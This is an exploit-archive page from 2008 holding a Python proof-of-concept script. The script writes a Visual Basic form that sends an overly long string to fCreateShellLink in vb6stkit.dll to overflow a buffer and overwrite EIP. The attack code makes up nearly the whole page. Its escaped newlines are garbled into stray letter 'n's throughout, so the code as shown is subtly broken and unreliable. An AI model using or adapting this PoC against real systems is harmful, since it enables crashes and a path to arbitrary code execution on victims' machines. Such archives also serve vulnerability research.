[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Visual Basic Enterprise Edition SP6 vb6skit.dll Buffer Overflow PoC
# Published : 2008-06-18
# Author : shinnai
# Previous Title : uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 Range header DoS Exploit
# Next Title : P2P Foxy Out of Memory Denial of Service Exploit
-----------------------------------------------------------------------------
Visual Basic Enterprise Edition SP6 vb6skit.dll Buffer Overflow
url: http://www.microsoft.com
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
-----------------------------------------------------------------------------
# usage exploit.py
print 'Visual Basic Enterprise Edition SP6 vb6skit.dll Buffer Overflown'
print 'Descriptionn'
print 'vb6stkit.dll is a module that contains application programming'
print 'interface (API) functions that enable Visual Basic applications'
print 'to create shortcuts (Shell Links) programmatically.'
print 'In this poc we will create a form containing an overly long string'
print 'that we pass to the third parameter (lpstrLinkPath) to own EIP.n'
print 'Arbitraty code execution is possible but today I drank a lot of'
print 'wine therefore I was unable to write an exploit :-D'
Form1 = (
'VERSION 5.00n'
'Begin VB.Form Form1n'
' Caption = "Form1"n'
' ClientHeight = 3195n'
' ClientLeft = 60n'
' ClientTop = 345n'
' ClientWidth = 4680n'
' LinkTopic = "Form1"n'
' ScaleHeight = 3195n'
' ScaleWidth = 4680n'
' StartUpPosition = 3n'
'Endn'
'Attribute VB_Name = "Form1"n'
'Attribute VB_GlobalNameSpace = Falsen'
'Attribute VB_Creatable = Falsen'
'Attribute VB_PredeclaredId = Truen'
'Attribute VB_Exposed = Falsen'
'Private Declare Function fCreateShellLink Lib "vb6stkit.dll" (ByVal lpstrFolderName As String, ByVal lpstrLinkName As String, ByVal lpstrLinkPath As String, ByVal lpstrLinkArguments As String, ByVal fPrivate As Long, ByVal sParent As String) As Longnn'
'Private Sub Form_Load()n'
' mStr = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _n'
' "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _n'
' "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _n'
' "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _n'
' "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _n'
' "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _n'
' "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _n'
' "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _n'
' "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _n'
' "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _n'
' "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _n'
' "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _n'
' "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _n'
' "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _n'
' "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _n'
' "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _n'
' "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _n'
' "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _n'
' "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _n'
' "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"nn'
' strLinkPath = "c:" & mStrn'
' fSuccess = fCreateShellLink("....Desktop", "something", strLinkPath, "", True, "$(Programs)")nn'
' If fSuccess Thenn'
' MsgBox "Created desktop shortcut"n'
' Elsen'
' MsgBox "Unable to create desktop shortcut"n'
' End Ifn'
'End Subn'
)
try:
out_file = open("Form1.frm",'w')
out_file.write(Form1)
out_file.close()
print "nFILE CREATION COMPLETED!n"
except:
print " n -------------------------------------"
print " Usage: exploit.py"
print " -------------------------------------"
print "nAN ERROR OCCURS DURING FILE CREATION!"
# www.Syue.com [2008-06-18]